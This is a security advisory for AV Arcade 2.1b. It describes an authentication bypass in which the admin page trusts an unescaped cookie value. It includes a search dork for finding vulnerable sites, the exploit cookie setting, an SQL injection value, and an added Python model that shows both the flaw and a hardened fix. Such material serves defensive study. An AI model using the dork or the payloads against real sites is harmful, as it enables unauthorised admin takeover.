AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

2007.07.11
Credit: Kw3rLn
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Web: AV Arcade 2.1b
Site: www.avscripts.net
Dork: "Powered By AV Arcade"
Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

Vulnerable code (admin/index.php):

    $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid']."");
    while($row = mysql_fetch_array($sql)){
        if ($row['admin'] == 1) {
            define( 'ADMIN_ACCESS', 1 );
            [...]

The admin page decides who the caller is from the ava_userid cookie alone: the cookie value is never checked against a server-side session or any other proof of login, and it is concatenated unescaped into the query, so the client controls both the user id being looked up and the rest of the WHERE clause. If the row returned has admin = 1, ADMIN_ACCESS is granted.

Exploit: Set in your cookies: ava_userid = 1; and that's all :p

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]
[EOF]
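The following is an added example, not code from AV Arcade or from the advisory author. It models the admin/index.php check in Python against a constructed in-memory ava_users table (the table contents, the SECRET value and the cookie format are assumptions for illustration): vulnerable_is_admin() reproduces the flaw exactly as the PHP does it (raw cookie value trusted as identity and spliced into SQL), and hardened_is_admin() shows the fix a practitioner would apply: a parameterised query, and a user id that the server can verify (here an HMAC-signed cookie standing in for a server-side session) instead of a bare number the client chooses.

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-in for the ava_users table; not data from the real product.
SCHEMA = """
CREATE TABLE ava_users (id INTEGER PRIMARY KEY, username TEXT, admin INTEGER);
INSERT INTO ava_users VALUES (1, 'admin', 1);
INSERT INTO ava_users VALUES (2, 'guest', 0);
"""

# Assumed server-side secret; in a real deployment it lives outside the code.
SECRET = b"assumed-server-side-secret"


def make_db():
    """Fresh in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_is_admin(conn, cookie_ava_userid):
    """Model of the original admin/index.php logic.

    The raw cookie string is used as the caller's identity AND concatenated
    straight into the SQL text, so the client picks the row (ava_userid=1)
    or rewrites the WHERE clause (ava_userid=2 OR admin=1).
    """
    sql = "SELECT * FROM ava_users WHERE id=" + cookie_ava_userid
    for row in conn.execute(sql):
        if row[2] == 1:          # row = (id, username, admin)
            return True
    return False


def sign_user_id(user_id: int) -> str:
    """Issue a cookie the server can later verify: '<id>.<hmac-sha256>'."""
    mac = hmac.new(SECRET, str(user_id).encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{mac}"


def verify_cookie(cookie: str):
    """Return the user id if the cookie carries a valid MAC, else None."""
    try:
        uid_str, mac = cookie.split(".", 1)
        uid = int(uid_str)       # rejects '2 OR admin=1' and other non-integers
    except ValueError:
        return None
    expected = hmac.new(SECRET, str(uid).encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return None
    return uid


def hardened_is_admin(conn, cookie):
    """Fixed check: identity comes from a verified cookie, id is bound as a
    parameter, and only the admin column is consulted."""
    uid = verify_cookie(cookie)
    if uid is None:
        return False
    row = conn.execute("SELECT admin FROM ava_users WHERE id=?", (uid,)).fetchone()
    return row is not None and row[0] == 1


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, ava_userid=1        ->", vulnerable_is_admin(db, "1"))
    print("vulnerable, ava_userid=2 OR admin=1 ->", vulnerable_is_admin(db, "2 OR admin=1"))
    print("hardened,   ava_userid=1        ->", hardened_is_admin(db, "1"))
    print("hardened,   signed cookie for 1 ->", hardened_is_admin(db, sign_user_id(1)))
```

The signed-cookie scheme is only a stand-in: the real fix is to key the lookup off a server-side session established by a password check, which is what the original code never does. The parameterised query closes the injection path independently of how identity is established.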



Copyright 2021, cxsecurity.com
